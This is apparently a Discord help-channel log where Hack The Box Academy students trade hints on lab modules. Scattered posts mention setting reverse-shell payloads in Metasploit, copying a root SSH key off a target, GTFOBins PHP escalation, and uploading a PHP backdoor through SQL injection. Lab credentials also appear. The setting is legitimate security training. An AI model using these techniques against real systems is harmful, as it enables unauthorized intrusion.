#modules

It doesnt work. I thought it would but it doesn't. It still returns with http-proxy

one of the commands I use is: nmap -sV -Pn -p8080 <IP goes here>

well when i tried i just did nmap -sC -sV {ip}

so try that

Where did you put the port?

i didnt specify port

Thank you so much! I expected it to be way more complicated

Thanks! I got it now 🙂

When im doing System Information for Linux i cant seem to type the password in when logging into ssh

hey guys anybody help me

for getting started module

please dm me

module is privlege esculation first question

i cant be root i tried all ways but i cant be root

Linux doesn't display an indication of passwords length or anything while it is being entered. Just type it it and hit enter.

I'm blocked in the Windows Fundamentals module
My problem is that i dont know where to put the command Get-WmiObject -Class win32_OperatingSystem on the linux after the RDP can you help me pls?

It should go into powershell.

hello everybody.

Hello all

PM me if you need help

Could someone dm me i need some help

Just ask your question.

Okay when using the academy everytime i try to nmap it says the host is down but on the page like public exploits and the next one there is no file to download to connect with the vpn

For the VPN double check that you don't have multiple tun interfaces. If no VPN file is provided the target instance is a public facing docker container.

Okay so even tho no vpn file is provided is it still okay to nmap it and stuff like that? Will do on double checking the tun interfaces i got frustrated with it last night and when to the machines on the regular hackthebox site and connect with the vpn and spun up the machine and it said the same thing.

Next time you run into show the VPN log and I can take another look.

If that's in scope of the challenge sure. However, I would not that ISP's sometimes rate limit that. So you probably want to make sure to keep timing down.

hi guys, iam studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can't, someone can give me some clues please

you only need to download the ovpn file once. it works for everything on the academy vpn

Can anyone help with this? "Access the SMB share folder called 'flag' and submit the contents of the flag.txt file."

you need to access the smb service then look around for flag.txt

Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer. any hints on this

windows fundamentals hint

Anybody dm me for help

I'm stuck in the section GET Method of Web Request. When i use Burp my browser does not load any page so i cannot progress in the exercise

Anyone had a similar issue ?

So for linux fundamentals it tells me to find a index number. how do i do that?

I'll give a small hint, you're looking for an executable (as stated in the question). That small hint helped me find it.

Do the targets just not work sometimes?

When burp is on, it will intercept all browser traffic so it looks like it isnt loading but it is just stuck in burp. All you have to do is press the forward button in the proxy tab

thanks. I've tried that too but what happen when I do does match what module says it should happen

hi guys, iam studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can't, someone can give me some clues please

Can someone help me with the second challenge question in the getting started with offensive security module - privilege escalation. I had no problem going from user1 to user2, but I’ve been stuck on the user2 to root. I know I have access to read root .ssh keys, but I’m having trouble copying them to my attack machine so I can use the -i flag to ssh in as the root. Anyone have any hints on what I’m missing?

if youre making the ssh files in vim, do it in nano because it didnt work for me until i used nano

@slate arch I was initially trying to use SCP to copy the id_rsa to my attack machine. How do you copy it in VIM? I have 0 experience with VIM

i dont know what scp is, but you can just cat the contents, copy them then paste them into nano on your own machine

hello, thanks for your answer, I tried to do the following: to the guest user that I get when I log in: guest_412484878abc33!, I changed it to admin_412484878abc33! and I converted it to base64 to replace the guest cookie but it didn't work. Please help me, only need this exercise to comple the module.

i am doing web requests fundamentals and when i use the pwn box to try and use an http proxy it doesnt give the option to do port 8080 or whatever the burp suit is supposed to be

hi, you have to configurate your browser, in the proxy options, you have to put the burp suite ip and port that is listening (by default 127.0.0.1:8080), another alternative is to install foxy proxy addon in your browser and configure it with the ip of brup suite

I'm having trouble with the HTML Injection part of the web applications module. Isn't the answer supposed to be how you normally put links into HTML code?

Hi guys, can someone who finished introduce to brute forcing module help me? I'm stuck in.

Hi 2 all. I finished Linux fondamentals module and i realized that it's impossibile to catch all the 10 coins available ...is it normal ? There's a question quite hard to answer...

Thank you so much, I could not get the key to work when I was pasting the contents to vim

Okay when i connect to the academy with a vpn the last line says "2021-05-09 15:31:04 Initialization Sequence Completed" but anytime i try to nmap something it says the host seems down any idea what im doing wrong?

Okay so im just starting and im in linux fundamentals how do i go about finding htb student mail. I've tried
Find / -name 'mail' 2> /dev/null
But both /var/mail and /var/spool/mail are incorrect answers but going to the dorectory / doesn't yield a visable path to anything labeled mail.

Meant directory not dorectory

hi guys, iam studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can't, someone can give me some clues please

Using vim I could not get access to root as soon as I used nano i got right in thanks for the tip!! Finally got that second flag at /root/flag.txt on Privilege Escalation section thanks i kept trying Vim and almost gave up on it!! Thnks for the tip @ Arooshwastaken

VIM was driving me crazy as well!! I was about to give up, I need to get my vim skills up i'm sure it would work just wasn't doing something right

Find a way to start a simple HTTP server using "npm" - This question drive me crazy ! Honestly i didn't use npm before and i don't understand how to start an HTTP server on it...

the same with this : Find a way to start a simple HTTP server using "php" - OMG What a hell is an HTTP server first of all...no one told me about it in that module...

Oh yeah thank's a lot bro, i just remember to myself about the existence of "man"

so the first thing is the man to understand the world !!! OHyeah

doesn't matter about coins..we can buy them as they cost few money...it's just a question of "honour" ...it would be better to have all tasks done than 1 missing..

What do you mean for " all your fault" ? It just depends by the use of "man" command

i just realized that my biggest fault is that : don't considerate and dont' use "man" command

What do you mean for : "the correct method" ? I think the correct method is to use all the information we've got and to use them in order to find out the solution of the problem we face into

so, although i didn't used the man command i was not able to find the answer to those questions...

i think most of our problems come out because we didn't think "out of the box" . Once we get familiar with that , we get better and better day per day...

I was stuck in those questions cause my brain says to me : " What a hell means that if the module spoke about other topics ?" eTc etC...

TY

the most common problem we've to face before to start studying everything is : TO LEARN TO LEARN

i write it better : LEARNING TO LEARN

on other example : There's not any module about ssh connection. So if You know it you'll be able to do it otherwise You could get stuck in the first exercise.

Inside Linux Essentials ?

ahhhh so that's an other fault for me : i didn't use the getting start module but just Linux essentials as first and now i'm on Learning process...

Yeahhh this is mandatory for me . As i get stuck i quit and i come back next day with brain fresher than before. It Works Great !

I start with HTB academy and i'm really satisfied about it. Now i want to use it , after i'll follow your suggestion.

IMHO cybersecurity is way of living

ok i'll write it down so to remind me - Tryhackme

Use the credencials admin:Welcome1

its been 1 month amigo xd thank you anyway!

I'm stuck too

Is there anybody who can help me?

I cant solve a problem in Cracking into hack the box path

maybe I can help, explain your problem

Cant I send pictures from here?

I think you can

It doesnt work. I dont have permission

Can i send you the picture privately then?

you have to verify, send a dm to the hackthebox bot ++verify

sure

i added the proxy to foxy proxy but now the websites wont load do i have to do smth in burp suit to besides turning on intercept

do i need to configure my target details

Use a Union injection to get the result of 'user()' what does it mean ? plz dm

Hello!!
Could you Advise me with some machines to practice kerberoasting
Asreproast and kerberos brute- force?

Golden ticket vuln

@hard orbit - Not the correct channel for this question, please verify ++tryverify and ask in #red-team.

Thank you very much @burnt stone

Thank you i actually was logged into htb student. That was not the problem but i did end up finding the answer.

i just need help for the windows fundamentals module

is this the windows NT version? pls

Yes.

but when i submit it it says that its incorrect

how

like why the nt version is not good when i submit it in the academy

@mint ermine Just a heads up, please don't spoil answers.

ok

sorry

ok but i found the answer

anyone else having issues with Nibbles on getting started? I get a time out error when trying to get a reverse shell as root. (using sudo to run the exploitable script)

so i idd the advice that this person gave me and i manualy configured it to use 127.0.0.1:8080 and the intercept worked but the page didnt load it just gave me this
GET / HTTP/1.1
Host: 138.68.183.83:30836
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT
If-None-Match: "2d-432a5e4a73a80"
Cache-Control: max-age=0

im trying to get someone to do a video with im gc2 and need someone that can code

how to use burp in instance because my web extension is disable in firefox ?

More recent versions of burp have a built-in browser. Alternatively, you can set up the proxy manually.

yes but "refusing to start browser as your current configuration does not support running without sandbox" when i want start the browser in Burp

Mmmm.... That's unfortunate.

:-/ Guess it's manual configuration then.

When I start up FoxyProxy I don't have the option to use the burp proxy even while intercept is on. Using the pwnbox for HTB

Tried using ZAP?

Not yet - I'll give it a shot thanks

hey guys i need some help

i just started the academy and im on LINUX FUNDAMENTALS on the section User Management

i looked at the commands to use, and im on question "Which option needs to be set to create a home directory for a new user using "useradd" command?". I just need to know where to even start with this

can somebody help me out

@dark solar By default ‘useradd‘ command creates a user’s home directory under /home directory with username. Thus, for example, we’ve seen above the default home directory for the user ‘tecmint‘ is ‘/home/tecmint‘. However, this action can be changed by using ‘-d‘ option along with the location of new home directory (i.e. /data/projects). For example, the following command will create a user ‘anusha‘ with a home directory ‘/data/projects‘. https://www.tecmint.com/add-users-in-linux/

[root@tecmint ~]# useradd -d /data/projects anusha

I want to start this by saying that I'm absolutely a brand-new and inexperienced learner to all of this, so forgive my ignorance. I'm working on the Windows Fundamentals module, and I'm stuck on the first question, which states "What is the Build Number of the target workstation?". I'm not sure at all how to proceed to find that. I see there's some command in the text on the page that I'm supposed ton use, but where and how do I use it?

@runic flax Open a Windows terminal. Type commands 'systeminfo' and 'ver'.

I would need to connect to the generated target before doing that, correct?

foxy proxy is just a plugging that facilitates the configuration of the proxy in the browser, even if you do not have foxy proxy you can configure the browser in the option to configure proxy and put the ip by which burp suite is intercepting (by default 127.0.0.1). If you have foxy proxy you should create this configuration in the foxy proxy options and save it, this will allow you to enable and disable the configuration easily with a click.

hi guys, iam studying Web Request module and i have problem to resolve the Post challenge, i have de user guest:guest and de target, i have to manipulate the cookies to get admin user, i try but i can't, someone can give me some clues please

what is the answer of which NT version is installed on workstation

??

Go over what you just learnt

Yup - that did it earlier. Didn't quite understand reading the initial steps.

@runic flax I don't know exactly what ur working on -- but yes. You need to connect directly (or indirectly) to the target and run commands.

hi there

In GET Method
How can i answer this Question (Send a GET request to flag.php with two parameters num1 and num2 such that their sum is 1337.)

Do what it says. Send a get request with 2 params to flag.php

yes

i need help
i don't understand it

what do u dont understand sir?

hello friends, I feel really stupid right now, 3hours I read throug the "Learning Process" Part.
The question is what is the difference between theese two numbers : (1.00)365 = 1.00
(1.01)365 = 37.7
I tryed all my Ideas without luck.
pls can someone help me as this is nothing that has to do with programing.

I tryed : 0.01 / 27.1 / progress / I fell like this question is just does niot work in my head

error

37.7 - 1.00 hint

36.7 🙂 got it brosinzkis 😄

u are the best team

hi

hi

@rustic sage @main vapor to access the rest of the channel, here are the instructions.

++tryverify

To talk in other channels you need to verify yourself first:

1. Send ++verify in the #bot-commands channel
2. Follow the instruction you will receive in PM (i.e send ++identify <Account Identifier> directly to the bot
   (The instructions are available in the #welcome channel)

What is the root folder of a wordpress site?

@tight glen Depends, from most of the boxes on here that i've messed with its usually C:\inetpub\wwwroot\wordpress

Something alone those lines

@tight glen basicly it refers to the location where the wordpress-application is located on the server.
Like @frosty sky mentioned, this could be 'C:\inetpub\wwwroot\wordpress' or '/var/www/wordpress/' on linux systems
The safest way to confirm what it is, is by checking the webservices configuration files!

Guys, as a side question! Any suggestions on where i could start (e.g. a specific exercise)?

@surreal zenith Have you done any boxes yet?

Well no, im still trying to figure out how to start with htb 😄
And im still doubting between using a raspberry or a vm.

@surreal zenith Depends on your hardware. If you have a decent PC or laptop the VM is probably your best option as it will help you with hashing etc.

HTB i started with the starting point machines, connect to the VPN and start running through the walkthroughs until you get to grips with it. I'd avoid the vaccine box as its designed in a way that other users can essentially block you from completing it in good time. Archetype is a great little box for starting on

@frosty sky That vaccine box thing sounds like a frigging delight! 😄
And thanks for mentioning then need for hashing-functions! a vm seems the best way to go! 🙂

thanks for the answers

@fathom lark you solved it ? 🙂

i could have found the flag in 15minutes. i just configured something wrong in metasploit. damn.

@tight glen you solved it?

it took me forever

aaah super!

thanks 😉

well in case of blocks or issues

its always a good choice to go to what you know!

if its a webservice (like wordpress) looking into the configuration of the webservice it self, is always a nice indication

same with network connections and/or routes! checking the network config can clear out a lot of unknowns

thats true, thanks for your advice

yw, it's how i've worked for years! so that skillset is in the bag! 😄

im stucked at the part public exploit. So i figured it out wich metasploit modul i need and filled out all field which are needed i think, and the auxilary modul does run succesfully. has some any hints why i cant see flag?

@autumn path if its a meterpreter session you mean, this gives you low level access to the machine. You have to find ways to upgrade it.

Meterpreter gives you access to the house, but without the correct keys you cant access all the doors inside 😉

damn

hey i need help if anyone is interested. im goin thru htb academy. im on linux fundamentals, (table of contents) is "the shell", system information. its got me trying to login in as htb student and put in the htb password. i do the ssh [htb-student@xx.xxx.xxx.xxx] then it ask me if i want to continue to password, i type yes, it asks for password, i have the password, but for some reason the terminal will not let me type anything after that point? im confused and quite aggravated. i have the info but cant enter it by no means. am i doing something wrong?

Im stuck on The Shell/ system information. Im unable to find the correct syntax to use ssh to login to the [username]@[ip address] and cant find any real examples from googling so far

rampage23, the only imput u should have to imput is "ssh [htb-student]@xx.xxx.xxx.xxx" . minus the quotation marks. then itll ask if you want to contimue to password. thats where im stuck at. once it asks for the given password i cant type at all on the terminal.

rampage23, the only imput u should have to imput is "ssh [htb-student]@xx.xxx.xxx.xxx" . minus the quotation marks. then itll ask if you want to contimue to password. thats where im stuck at. once it asks for the given password i cant type at all on the terminal.

It doesn't show if you've typed anything. It's standard with linux just type in/paste the password and hit enter

ive tried typing the password without it showing it and also tried copy and pasting it. keeps telling me access denied.

The password is:

HTB_@cademy_stdnt!

did you enter it correctly?

many times yes. im finally in. the only thing i changed was, i was using the username with brackets. it would lead me to the password login. couldnt get anything to work. so i removed the brackets from the username, then tried tpying the password blindly and now im in. what a relief. whew..

help

i am doing the final section in getting tarted module and i m stuck

i found an metasploit exploit for unathuicated access and arbitrary file exe but when i run the exploit it says the exploit wa completed but no sesion was created

the system is runnig a getsimple website

pls give me some hint to put me back on the right track i'd really appreciate it

You dont get an shell in that exercie, you just need read file from the system. And my problem ist the auxiliary module runs succesfully but still ont see the result i need

Ahhh my bad, It was late... I read it wrong.

What are (long version of the option)? Which option needs to be set to lock a user account using the "usermod" command?

The command is -L correct? but what is the long form its asking for

no examples on the page i see for that

Have you tried looking at the man pages for that command?

no do they have long versions? or is it asking me to type out the string of commands to execute it?

The answer is in the man page 😉

wait where is the man pages? you mean the ones given inside the modules? ive copied my own files of all of those unless the man page is completely seperate

i just started like yesterday lol

Have you done the Linux Foundations module?

Hello there.

I've finished two modules so far and I need a different module to start that is fundamental and is the easiest to learn as I'm a beginner.

I've done the Introduction to HTB & Learning Process.

im on the linux fundamentals module now

I suggest Linux Fundamentals and Windows Fundamentals

Alright, thanks!

done learning process and intro to academy.. now on linux fundamentals

oh i found the man pages ill check em

👍

ok thank you that was easy again overthinking it.. the only long command i knew was --help and thought that would be too obvious of a solution lol

Overthinking is usually my problem too 🙃

└──╼ $mkdir /opt/nishang/ && git clone https://github.com/samratashok/nishang.git /opt/nishang
mkdir: cannot create directory ‘/opt/nishang/’: Permission denied
┌─[✗]─[user175587@htb-hmxbixkv3e]─[~]
└──╼ $

any advice for this lol

what permissions would you need?

i have no idea it wont let me create a directory?

an it was the next step... mentioned nothing about permissions.

well you should have basic knowledge for Linux if you wanna use it. I recommend you to jump into Linux Fundamentals module (for free) and make you familiar with that OS.

this is literally in the module

an im using their spawned linux

"Working with Files and Directories"?

yeah linux fundamentals-system managment on package managment

they first lesson on page 7 is package downloading which seems easy enough but their linux instance says i dont have permission to create new directories

should i try and reset the instance

i see the working with files and directories section but it is further down in the fundamentals module

no, just give me a moment

put a sudo at the beginning of the command

$ sudo mkdir /opt/nishang ...

ahh ok will try it

i gonna fix that in the module

fixed

so it started cloning but again gave me a permission denied

$ sudo mkdir /opt/nishang/ && git clone https://github.com/samratashok/nishang.git /opt/nishang
Cloning into '/opt/nishang'...
/opt/nishang/.git: Permission denied

ima move down one and see if the other methods have issues

refresh your section page and check the command again

ok

alright thank you good to go

same issue with the debian package installation commands.... but just went ahead and added the sudo and was good

$ dpkg -i strace_4.21-1ubuntu1_amd64.deb

thx, fixed

I'm trying to scan my target using nmap and it is saying that all the results are filtered. I know that this is due to a firewall but I have the VPN working and everything. I stopped the VPN and redownloaded the vpn key again as well. Any solutions?

I think the target that you are scanning has firewall enable, you can try to use some evasion techniques mentioned in nmap manual page

i am in the web requests section of the Academy trying to get passed this POST method page. I've done every combination of curls and burpsuite repeater get/post request I can think of. Following the instructions I never found a PHPSESSID to apply to my request. I'm guessing that must be a rabbit hole at this point.I have also tried a ton of curls which has not yielded any useful information to me. This is my fourth attempt on this page and I'm completely out of ideas. Can I get a nudge pleasE?

@maiden kiln Nah, I dont think so. I'm doing the public exploits section of Getting Started, and I had done the nmap portion before and was able to get some decent results telling me what services were running on what ports but now I am getting only a message saying that all __ ports are filtered. I've tried a ton of different combinations of nmap arguments with no luck

@untold schooner it's quite simple just analyse the cookies

Hint: admin has unique authentication

@flint moth ok I’ll take another look. Thank you so much.

help i am doing the knowlegde check of getting started module and i am stuck, I am performing web directory brute forcing like it was shown in the module but can't find the password. The box is running the getsimple web app i found two exploits but only one seems to work and it requires admin creds

I am stuck and i would appreciate some hints

@jade whale have tried the other one ?

wat

Other exploit

yes

it said not vulnerable

The 2nd one should work , try checking the details you entered

the other exploit uses an exposed api key and cookies to get a shell

all i need to enter is the target host and the targeturi

i did it but it didn't work

i am still new to this so maybe i am doing something wrong

Did you entered the correct payload , LHOST etc

i now nothing about payloads

all i know is the default meterpreter

Well check the previous sub module in which it explained to use metasploit

There the person mentioned setup a reverse shell payload

oh yh

so do i have to create the payloadd?

andd sendd it into metasploit?

Nope just do as it is mentioned set payload <name of that reverse shell mentioned> in metasploit

After selecting the 2nd exploit

i don't recall i saying anyting regaurding a metasploit payload

i can recheck though

There should be , set payload generic/shell_reverse_tcp

oh u r right

i just checked

dang i am stupid

lemme try it

Just make sure to set correct lhost

ok

didn't work

welp

back to square 1 i guess

What you get after executing it?

never mind

i am jut an idiot

i ste the target host wrong

lol

LoL it's okk

it's very slow but it worked

thx so much

i really appriecat it

crap i cn't spell lol

👍

Glad I could help

hi all - is there a bug for the getting started knowledge check foothold? The specified button on the exploit is greyed out and the metasploit module doesnt work - I have actually found another way in, but i would like to do it the intended way also

ANY body help me <@&506943166365302789>

Oh good. You pinged all Administrators regardless whether they are HTB employees or Discord admins.

Why?

You haven't said anything in over 6 weeks

In fact this is your 2nd message

Little too soon to be pinging all admins without anymore context isn't it

Hi, im currently doing Getting Started/ privilege escalation and i believe the provided password is not correct or has been changed

works for me @tight glen

check your spelling, capslock and the IP

step 2 is trying to reset the target

thats what i did, will try again, thanks

did that aswell

well, let me try it again.

works now 🤡

this time it asked me to trust the fingerprint tho

thank u anyway

ah 😄

np

Hi I am having an issue with the Module for Web Requests. When following the examples in the page for the burp suite to connect to the http://inlanefreight.com I do not get to see what apache server is running on the machine as the example image. On the questions asking what http protocol is used to intercept I get the same error

The same happens when connecting to the target IP address. I only get a success but no Server information to see what the IIS service is running as as well as the HTTP protocol being used for the intercepts

@cyan temple mind DM'ing me screenshots of what you're seeing?

also are you using the Target system?

You may need to

@tight glen your user name is wrong, look at the credentials you are provided

@cyan temple I just tried the exercises and using the target that you have to spawn (just above the exercises) I can see which HTTP method used and what version the server is 🙂

hy, i have some problem to understand in web request modules how send the cookie as admin for enter into the page as admin,someone can help me?

i have already tried to change it in encode base64 "admin" but it doesn't work

someone can explain me it??

@rancid tide DM I might be able to help

Hello together, I have the same problem... somehow I cannot even reach the target system :/

this is just a theoretical question (reading through setting up) but i am asking anyway because i am curious

im reading through the part about containers and i understand the difference between them and a vm and i have interacted with containers in ctfs before but i realize now ive never interacted with a vm inside a vm and only a container inside a vm in a ctf environment. is this something thats like doable through command line like docker or if there was a hypothetical nested vm ctf box would you need to rdp or something in order to interact with it properly?

or does this not really come up even in more unrealistic ctf environments

Hello guys, when i try running hashcat i get the error message "clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'"

has anyone a tip for me to solve this?:)

im using a AMD A8-3870 cpu:)

oh no,i have already found the problem,i had do a wrong encode base64 of the cookie

have *done

Are you on a Mac? https://hashcat.net/forum/thread-7554-post-40657.html#pid40657
This suggests that OpenCL was deprecated causing that same error

I'm having a problem in Linux Fundamentals "System Information"

I can't find the path to htb-student's mail

I'm in /var/mail but it's empty

so is /var/spool/mail

iam also stuck at this module

do you know if its necessary to login via ssh in this module?

oh nvm, it is

Sup everyone, I'm not proudly stuck into the module networking intro in sub section subnetting the questions 3 and 4 required an exact answer, I'm sure the answer it's ok, but it doesn't accepted, anyone can give me a light on this?

this are the questions:

Split the network 10.200.20.0/27 into 4 subnets and submit the network address of the 3rd subnet as the answer.

Split the network 10.200.20.0/27 into 4 subnets and submit the broadcast address of the 2nd subnet as the answer.

Hey you can run php binary with sudo in the current user, that lead to privesc

thanks for the explanation, not sure what to do but ill figure it out

try to read about command injection bro

i did!

i havent found anything related to php yet

@tight glen please be careful with spoiler because your screenshot contained username, target host and the output that is relevant for the exploitation of that machine

hi i am attempting to count the amount of files on the system that have the .bak extension (idk how much i can say without spoiling but i am doing something with find and i am redirecting output and error) but i am still not getting the correct answer, i would appreciate assistance if someone is free

nvm i missed something obvious because i way overthought it

Hey, I just can't remember that question but just check the examples

oh i did it

i was under the impression there were some that only root could see

because i overhtought it

and i was trying way too hard

but i took a break for 2 mins and then it was fine

if you still havent found anything, gtfo bins is a cool tool

i was on there, thanks tho i will look further into it

the thing is i need a one liner im pretty sure

I have a question regarding the Getting Started Module, more precisely to the last question in the "Service Scanning" section: Access the SMB share folder called 'flag' and submit the contents of the flag.txt file
Should there be a share with the name flag?

I managed to get these shares, using some credentials, but I can't access a single one of them.

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    users           Disk      
    IPC$            IPC       IPC Service (gs-svcscan server (Samba, Ubuntu))

no i dont got a mac

DM me and send me the command you are trying to run

systemctl enable ssh returns uninitialized value

Synchronizing state of ssh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable ssh
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.
Use of uninitialized value $service in hash element at /usr/sbin/update-rc.d line 26, <DATA> line 45.

i need help with this:

sorry the second question^

Hi, currently doing ||getting started/Knowledge check||.

could somebody explain to me why i cant execute linPEAS/linEnum scripts? i can execute anything using php but im not sure how to pull this off https://gtfobins.github.io/gtfobins/php/ is prob the right source, a hint would be great. -Update: dont need more help

look under "usermod -h" pretty sure you´ll find this

ok

did you find it?

"There are none so blind as those who will not see" 😄

It only just took me like1 jr i think

Its not cool lol

please dont copy this...lol

All these emojies i have are free right

Cool

Chirp. Cjirp

#general

Can anyone help me with SQL injection writing files chapter? Especially what kind of backdoor php shell should i try to upload

Maybe you've to take a look around payloads available on the database of metasploit framework

I've completed the Knowledge Check section of the Getting Started module, however I did it without using Metasploit.

I simply could not get it to work with Metasploit.. I kept getting an error:

[*] Started reverse TCP handler on 10.10.15.18:4444 [*] 10.129.7.198:80 - Authenticating... [+] 10.129.7.198:80 - The authentication process is done successfully! [*] 10.129.7.198:80 - Extracting Cookies Information... [*] 10.129.7.198:80 - Uploading payload... [-] 10.129.7.198:80 - Exploit aborted due to failure: unknown: 10.129.7.198:80 - Upload failed [*] Exploit completed, but no session was created.

Could someone who has completed that section using Metasploit please send me a message? I'd like to understand why it wasn't working

Hi 2 all. Anyone involved into "learning process" module ?

Actually I've just managed to get it working using exploit 1 instead of 0... Did anyone manage to do this part using exploit 0? CMS PHP File Upload Vulnerability

i think you need to adjust the payload in the SET OPTIONS - i mean you need to find the correct payload for it

Well I set the payload to a generic_reverse_tcp.. I suppose the vuln will only let us upload a file, not actually execute the code.. but even so, it's still strange it fails to upload

If anyone has any insight that would be really helpful! Still don't feel like I fully understand what's happening

Yeah

I completed it yesterday

what is the recommended approach once you have completed all the fundamental modules? I saw advice in one of the sections mentioning going through some walkthroughs in Starting Point before attempting boxes

Please do mention me too in the reply to this question.

@pulsar elm please be careful with spoilers

But... is not correct... I dont know if it is right way to do it or wrong xD

That is what I am trying to know

did anyone have trouble connecting via RDP for the Windows Fundamentals module?

[16:46:52:999] [4463:4464] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[16:46:52:999] [4463:4464] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[16:46:52:999] [4463:4464] [ERROR][com.freerdp.core] - freerdp_post_connect failed

when iam executing this, it didnt print anything. If I remove "2>/dev/null" it prints to every file "permission denied"

can anyone help?

add sudo

before find /

its still not printing out anything

I think there is something wrong on the command

Can u tell me which module

U do

yeaj sure

the Linux Fundamentals

Oh ok

"find files and directories"

is the content

Ok wait...

BRUH I can't access because I don't have enough cubes 😂

Sorry man

HAHAHAHAHA

dayum

I can send you screens if you want to

Ok

here in the chat or private?

DM

Ok I think it just didn't find any file with the information that u put

lol

but

wait

thats impossible

i dont get why

Because in -name u have to put the name of the file

i did, every file with the ending .conf

u have to put after the -user ur name of HTB academy

and put a thing after -exec

what do you mean "a thing"

but when I try this command on my kali it said ```zsh
find: missing argument to `-exec'

exec is for execute a scipt

yeah it executes the "ls -al {}"

or not

no it does'nt execute the ls-al {} thing

hm

try to use grep

before

ls-al{}

sudo find / -type f -name *.conf -user nixfund -size +25k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null

try this

and put ur htb student name

I tried the command and it works for me

I don't have any output because I don't have .conf file

Hello, I have an issue with Burp/FoxyProxy. I have set up the proxy but when I try to connect to the Target, page wont load, it's loading forever.. any idea what might be wrong?

How did u set up ur proxy ?

if you set up your foxyproxy correctly, its because Burp captured your web request

Options > Add .. HTTP 127.0.0.1:8080

looks good

check out your Burp

Ok it's normal

now as @drifting knoll said u have to have a thing in ur Burp Suite

yeap, I am able to intercept the request, but I thought I would be able to see the content of the page (in the browser) as well

therefore you need to forward the request

I see.. makes sense. Thanks for the prompt response @scarlet finch and @drifting knoll

Clearing the message for some spoiling. Read the question carefully. You aren't just looking for a running process. You want to find the executable name of an update service specifically.

ok

is there a way to SSH into the HTC-student@x.x.x.x from my virtual machine kali instead of going through the website? how do I connect the VPN to my own VM?

Yes. Download the VPN key and start openvpn using that key as an argument. sudo openvpn <key-file>

new to htb. I'm trying out the 'archtype' starter machine. I downloaded and installed openvpn (windows). launching the startingpoint file fails due to numerous netsh errors. help appreciated

in getting started knowledge check module. I got the flag, but without root access. So I wanna ask is there a way to get root access?

web requests module, i got the login, but doing username:password didnt work, neither did the password alone

what do i put in there

Best channel for that is #starting-point. You'll need to verify. I would highly recommend setting up a linux VM to work from.

Potentially? Not sure. Haven't done that module but if you got the flag, you met the objective.

maannnnnnnn, my bad. I was the one limiting the available exploit. Well root is easily possible.

I'm having trouble with the system information section of Linux fundumentals

not sure how to find the path to htb-students Mail

check your environment

Ty!!

That worked

In the "WEB REQUESTS - POST Method" I am changing the cookie (which was previously modified to xxxx_12345)in the GET dash request, but the answer is not correct because/and if I refresh I am redirected to login page. What am I doing wrong?

hello

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer. I did curl | grep "inlanefreight.com" | wc -l . But still says wrong . Help Me . Thanks in advance

ok, I'm confused about something... I'm on Navigation and I'm looking for the index number for sudoers in /etc

the command I used was ls -i sudoers

it revealed the number being 18467, but the it says that's the wrong number!

what am I doing wrong?

@everyone please help!

never mind, figured it out lol

thanks

Trying to tag everyone doesn't work. If you're requesting help, please be patient.

Fair enough, sorry

@fallow mesa

Would you two jump to dms to avoid posting spoilers in this channel?

Sorry my bad!!

All good! Thanks for the understanding!

Just doing that is not enough, there are many non unique sub domains there + the original domain. You have to apply more filters. You can use some more options with grep, regular expressions, use sort to remove exact duplicate results and sed if you want to do some more complex stuff. keep trying and Dm me if you need any additional hints

hi everyone, I'm in the win fundamentals module. I try to do the lab, but I cannot connect to target using the command xfreerdp /v:<targetIp> /u:htb-student /p:Password , any suggestions??

What is the output of that command?

[16:19:03:171] [14063:14064] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:19:03:171] [14063:14064] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[16:19:03:172] [14063:14064] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[16:19:03:172] [14063:14064] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[16:19:03:533] [14063:14064] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[16:19:03:548] [14063:14064] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[16:19:03:548] [14063:14064] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state
[16:19:18:563] [14063:14064] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[16:19:18:564] [14063:14064] [ERROR][com.freerdp.core] - failed to connect to 10.129

Probably is a silly mistake of my behalf

Is this edited?

10.129
That doesn't look like the full IP.

sorry, this is the full last line

[16:19:18:564] [14063:14064] [ERROR][com.freerdp.core] - failed to connect to 10.129.145.74

Okay. No problem. Just wanted to check. Is the instance running? they shutdown after a bit. hard refresh the page to make sure something isn't cached oddly.

I reset the target (got a new IP) and also reset the VM Instance, but I got the same mistake

[16:33:44:087] [2271:2272] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[16:33:44:087] [2271:2272] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[16:33:44:088] [2271:2272] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[16:33:44:088] [2271:2272] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
